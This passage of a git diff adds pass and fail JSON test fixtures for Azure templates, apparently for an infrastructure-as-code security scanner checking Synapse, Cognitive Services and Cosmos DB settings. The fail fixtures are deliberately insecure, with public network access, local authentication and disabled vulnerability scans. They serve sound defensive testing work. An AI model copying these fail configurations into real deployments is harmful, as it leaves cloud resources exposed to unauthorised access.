+++ b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/pass.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces/bigDataPools",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "East US",
+      "properties": {
+        "isComputeIsolationEnabled": true,
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail1.json b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail1.json
new file mode 100644
index 00000000000..bec39a37b7c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail1.json
@@ -0,0 +1,24 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces/vulnerabilityAssessments",
+      "apiVersion": "2021-02-01",
+      "name": "fail1",
+      "location": "East US",
+      "properties": {
+        "recurringScans": {
+          "emails": [
+            "string"
+          ],
+          "emailSubscriptionAdmins": true,
+          "isEnabled": false
+        },
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail2.json b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail2.json
new file mode 100644
index 00000000000..f3ae3619f04
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces/vulnerabilityAssessments",
+      "apiVersion": "2021-02-01",
+      "name": "fail2",
+      "location": "East US",
+      "properties": {
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/pass.json b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/pass.json
new file mode 100644
index 00000000000..fb6fffcfe7a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/pass.json
@@ -0,0 +1,24 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces/vulnerabilityAssessments",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "East US",
+      "properties": {
+        "recurringScans": {
+          "emails": [
+            "string"
+          ],
+          "emailSubscriptionAdmins": true,
+          "isEnabled": true
+        },
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/fail.json b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/fail.json
new file mode 100644
index 00000000000..22d637ad9bb
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/fail.json
@@ -0,0 +1,21 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-02-01",
+      "name": "fail",
+      "location": "East US",
+      "properties": {
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      },
+       "dependsOn": [
+         "[resourceId('Microsoft.Web/serverfarms', 'test'))]",
+         "[resourceId('Microsoft.Synapse/workspaces/firewallRules', 'test'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass.json b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass.json
new file mode 100644
index 00000000000..a8162cdac6f
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "East US",
+      "properties": {
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', 'test'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass2.json b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass2.json
new file mode 100644
index 00000000000..6916abd631b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces",
+      "apiVersion": "2021-02-01",
+      "name": "pass2",
+      "location": "East US",
+      "properties": {
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json
new file mode 100644
index 00000000000..4fbba1f7504
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json
@@ -0,0 +1,33 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "accounts_pike_name": {
+            "defaultValue": "pike",
+            "type": "String"
+        }
+    },
+    "variables": {},
+    "resources": [
+        {
+            "type": "Microsoft.CognitiveServices/accounts",
+            "apiVersion": "2023-05-01",
+            "name": "fail",
+            "location": "westeurope",
+            "tags": {
+                "createby": "Terraform"
+            },
+            "sku": {
+                "name": "S0"
+            },
+            "kind": "Face",
+            "properties": {
+                "publicNetworkAccess": "Enabled",
+                "restrictOutboundNetworkAccess": false,
+                "allowedFqdnList": [],
+                "disableLocalAuth": false,
+                "dynamicThrottlingEnabled": false
+            }
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json
new file mode 100644
index 00000000000..90441225f09
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json
@@ -0,0 +1,36 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "accounts_pike_name": {
+            "defaultValue": "pike",
+            "type": "String"
+        }
+    },
+    "variables": {},
+    "resources": [
+        {
+            "type": "Microsoft.CognitiveServices/accounts",
+            "apiVersion": "2023-05-01",
+            "name": "pass",
+            "location": "westeurope",
+            "tags": {
+                "createby": "Terraform"
+            },
+            "sku": {
+                "name": "S0"
+            },
+            "kind": "Face",
+            "identity": {
+                "type": "SystemAssigned"
+            },
+            "properties": {
+                "publicNetworkAccess": "Disabled",
+                "restrictOutboundNetworkAccess": false,
+                "allowedFqdnList": [],
+                "disableLocalAuth": false,
+                "dynamicThrottlingEnabled": false
+            }
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json
new file mode 100644
index 00000000000..8f1a46d325f
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "accounts_pike_name": {
+      "defaultValue": "pike",
+      "type": "String"
+    }
+  },
+  "variables": {},
+  "resources": [
+    {
+      "type": "Microsoft.CognitiveServices/accounts",
+      "name": "fail",
+      "location": "West US",
+      "sku": {
+        "name": "S0"
+      },
+      "kind": "CognitiveServices",
+      "properties": {
+        "publicNetworkAccess": "Enabled",
+        "disableLocalAuth": false
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json
new file mode 100644
index 00000000000..95abec6ec32
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "accounts_pike_name": {
+      "defaultValue": "pike",
+      "type": "String"
+    }
+  },
+  "variables": {},
+  "resources": [
+    {
+      "type": "Microsoft.CognitiveServices/accounts",
+      "name": "fail2",
+      "location": "West US",
+      "sku": {
+        "name": "S0"
+      },
+      "kind": "CognitiveServices",
+      "properties": {
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json
new file mode 100644
index 00000000000..90f828d966f
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "accounts_pike_name": {
+      "defaultValue": "pike",
+      "type": "String"
+    }
+  },
+  "variables": {},
+  "resources": [
+    {
+      "type": "Microsoft.CognitiveServices/accounts",
+      "name": "pass",
+      "location": "West US",
+      "sku": {
+        "name": "S0"
+      },
+      "kind": "CognitiveServices",
+      "properties": {
+        "publicNetworkAccess": "Enabled",
+        "disableLocalAuth": true
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail.json
new file mode 100644
index 00000000000..41481242cbb
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail.json
@@ -0,0 +1,48 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2024-05-15",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "enableMultipleWriteLocations": true,
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "databaseAccountOfferType": "Standard",
+        "enableAutomaticFailover": true,
+        "ipRangeFilter": [],
+        "isVirtualNetworkFilterEnabled": true,
+        "locations": [
+          {
+            "locationName": "[variables('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "networkAclBypass": "AzureServices",
+        "virtualNetworkRules": []
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail2.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail2.json
new file mode 100644
index 00000000000..62f8d8b9814
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail2.json
@@ -0,0 +1,48 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2024-05-15",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "enableMultipleWriteLocations": true,
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "databaseAccountOfferType": "Standard",
+        "enableAutomaticFailover": true,
+        "ipRangeFilter": [],
+        "isVirtualNetworkFilterEnabled": false,
+        "locations": [
+          {
+            "locationName": "[variables('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "networkAclBypass": "AzureServices",
+        "virtualNetworkRules": []
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail3.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail3.json
new file mode 100644
index 00000000000..0fc1f849ff6
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail3.json
@@ -0,0 +1,51 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2024-05-15",
+      "name": "fail3",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "databaseAccountOfferType": "Standard",
+        "enableAutomaticFailover": true,
+        "ipRangeFilter": [],
+        "isVirtualNetworkFilterEnabled": false,
+        "locations": [
+          {
+            "locationName": "[variables('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "networkAclBypass": "AzureServices",
+        "virtualNetworkRules": [
+          {
+            "id": "Microsoft.virtualNetworks"
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail4.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail4.json
new file mode 100644
index 00000000000..af5317cc721
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/fail4.json
@@ -0,0 +1,96 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/azureFirewalls",
+      "apiVersion": "2020-05-01",
+      "name": "fail4",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "sku": {
+          "name": "AZFW_VNet",
+          "tier": "Standard"
+        },
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/firewallPolicies', 'example-policy')]"
+        }
+      }
+    },
+    {
+      "type": "Microsoft.Network/azureFirewalls/ruleCollections",
+      "apiVersion": "2020-05-01",
+      "name": "example/testcollection",
+      "properties": {
+        "priority": 100,
+        "action": {
+          "type": "Allow"
+        },
+        "rules": [
+          {
+            "name": "testrule",
+            "ruleType": "NetworkRule",
+            "sourceAddresses": [
+              "10.0.0.0/16"
+            ],
+            "destinationAddresses": [
+              "8.8.8.8",
+              "8.8.4.4"
+            ],
+            "destinationPorts": [
+              "53"
+            ],
+            "protocols": [
+              "TCP",
+              "UDP"
+            ]
+          }
+        ]
+      }
+    },
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2020-04-01",
+      "name": "fail4",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "locations": [
+          {
+            "locationName": "[parameters('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "enableAutomaticFailover": true,
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ]
+      }
+    }
+  ],
+  "parameters": {
+    "randomInteger": {
+      "type": "int"
+    },
+    "failoverLocation": {
+      "type": "string"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass.json
new file mode 100644
index 00000000000..fe0dad4dac0
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass.json
@@ -0,0 +1,52 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2020-04-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "enableMultipleWriteLocations": false,
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "locations": [
+          {
+            "locationName": "[parameters('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "enableAutomaticFailover": true,
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ],
+  "parameters": {
+    "randomInteger": {
+      "type": "int"
+    },
+    "failoverLocation": {
+      "type": "string"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass2.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass2.json
new file mode 100644
index 00000000000..39ffa4134a8
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass2.json
@@ -0,0 +1,81 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/azureFirewalls",
+      "apiVersion": "2020-05-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "priority": 100,
+        "action": {
+          "type": "Allow"
+        },
+        "rules": [
+          {
+            "name": "testrule",
+            "ruleType": "NetworkRule",
+            "sourceAddresses": [
+              "10.0.0.0/16"
+            ],
+            "destinationAddresses": [
+              "8.8.8.8",
+              "8.8.4.4"
+            ],
+            "destinationPorts": [
+              "53"
+            ],
+            "protocols": [
+              "TCP",
+              "UDP"
+            ]
+          }
+        ]
+      }
+    },
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2020-04-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "isVirtualNetworkFilterEnabled": true,
+        "locations": [
+          {
+            "locationName": "[parameters('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "enableAutomaticFailover": true,
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "virtualNetworkRules": [
+          {
+            "id": "Microsoft.virtualNetworks",
+            "ignoreMissingVNetServiceEndpoint": true
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass3.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass3.json
new file mode 100644
index 00000000000..7b5dc7e7b3f
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass3.json
@@ -0,0 +1,54 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2024-05-15",
+      "name": "pass3",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "databaseAccountOfferType": "Standard",
+        "enableAutomaticFailover": true,
+        "ipRangeFilter": [],
+        "isVirtualNetworkFilterEnabled": true,
+        "ipRules": [
+          "192.0.0.1"
+        ],
+        "locations": [
+          {
+            "locationName": "[variables('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "networkAclBypass": "AzureServices",
+        "virtualNetworkRules": [
+          {
+            "id": "Microsoft.virtualNetworks"
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass4.json b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass4.json
new file mode 100644
index 00000000000..c68f1383fa6
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBAccountsRestrictedAccess/pass4.json
@@ -0,0 +1,107 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/azureFirewalls",
+      "apiVersion": "2020-05-01",
+      "name": "pass4",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "sku": {
+          "name": "AZFW_VNet",
+          "tier": "Standard"
+        },
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/firewallPolicies', 'example-policy')]"
+        }
+      }
+    },
+    {
+      "type": "Microsoft.Network/azureFirewalls/ruleCollections",
+      "apiVersion": "2020-05-01",
+      "name": "pass4",
+      "properties": {
+        "priority": 100,
+        "action": {
+          "type": "Allow"
+        },
+        "rules": [
+          {
+            "name": "testrule",
+            "ruleType": "NetworkRule",
+            "sourceAddresses": [
+              "10.0.0.0/16"
+            ],
+            "destinationAddresses": [
+              "8.8.8.8",
+              "8.8.4.4"
+            ],
+            "destinationPorts": [
+              "53"
+            ],
+            "protocols": [
+              "TCP",
+              "UDP"
+            ]
+          }
+        ]
+      }
+    },
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2020-04-01",
+      "name": "pass4",
+      "location": "[resourceGroup().location]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "consistencyPolicy": {
+          "defaultConsistencyLevel": "BoundedStaleness",
+          "maxIntervalInSeconds": 10,
+          "maxStalenessPrefix": 200
+        },
+        "locations": [
+          {
+            "locationName": "[parameters('failoverLocation')]",
+            "failoverPriority": 1
+          },
+          {
+            "locationName": "[resourceGroup().location]",
+            "failoverPriority": 0
+          }
+        ],
+        "enableAutomaticFailover": true,
+        "capabilities": [
+          {
+            "name": "EnableAggregationPipeline"
+          },
+          {
+            "name": "mongoEnableDocLevelTTL"
+          },
+          {
+            "name": "MongoDBv3.4"
+          }
+        ],
+        "virtualNetworkRules": [
+          {
+            "id": "[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Network/virtualNetworks/example/subnets/default')]"
+          }
+        ],
+        "ipRules": [
+          {
+            "ipAddressOrRange": "192.0.0.1"
+          }
+        ],
+        "isVirtualNetworkFilterEnabled": true
+      }
+    }
+  ],
+  "parameters": {
+    "randomInteger": {
+      "type": "int"
+    },
+    "failoverLocation": {
+      "type": "string"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail.json
new file mode 100644
index 00000000000..71f760b762e
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail.json
@@ -0,0 +1,105 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.12.40.16777",
+      "templateHash": "13150321745581597627"
+    }
+  },
+  "parameters": {
+    "accountName": {
+      "type": "string",
+      "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+      "metadata": {
+        "description": "Cosmos DB account name, max length 44 characters"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for the Cosmos DB account."
+      }
+    },
+    "defaultConsistencyLevel": {
+      "type": "string",
+      "defaultValue": "Session",
+      "metadata": {
+        "description": "The default consistency level of the Cosmos DB account."
+      },
+      "allowedValues": [
+        "Eventual",
+        "ConsistentPrefix",
+        "Session",
+        "BoundedStaleness",
+        "Strong"
+      ]
+    },
+    "maxStalenessPrefix": {
+      "type": "int",
+      "defaultValue": 100000,
+      "metadata": {
+        "description": "Max stale requests. Required for BoundedStaleness. Valid ranges, Single Region: 10 to 2147483647. Multi Region: 100000 to 2147483647."
+      },
+      "maxValue": 2147483647,
+      "minValue": 10
+    },
+    "maxIntervalInSeconds": {
+      "type": "int",
+      "defaultValue": 300,
+      "metadata": {
+        "description": "Max lag time (minutes). Required for BoundedStaleness. Valid ranges, Single Region: 5 to 84600. Multi Region: 300 to 86400."
+      },
+      "maxValue": 86400,
+      "minValue": 5
+    }
+  },
+  "variables": {
+    "consistencyPolicy": {
+      "Eventual": {
+        "defaultConsistencyLevel": "Eventual"
+      },
+      "ConsistentPrefix": {
+        "defaultConsistencyLevel": "ConsistentPrefix"
+      },
+      "Session": {
+        "defaultConsistencyLevel": "Session"
+      },
+      "BoundedStaleness": {
+        "defaultConsistencyLevel": "BoundedStaleness",
+        "maxStalenessPrefix": "[parameters('maxStalenessPrefix')]",
+        "maxIntervalInSeconds": "[parameters('maxIntervalInSeconds')]"
+      },
+      "Strong": {
+        "defaultConsistencyLevel": "Strong"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2022-05-15",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "databaseAccountOfferType": "Standard",
+        "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+        "locations": [
+          {
+            "locationName": "[parameters('location')]",
+            "failoverPriority": 0,
+            "isZoneRedundant": false
+          }
+        ],
+        "capabilities": [
+          {
+            "name": "EnableServerless"
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail1.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail1.json
new file mode 100644
index 00000000000..e1476145487
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/fail1.json
@@ -0,0 +1,106 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
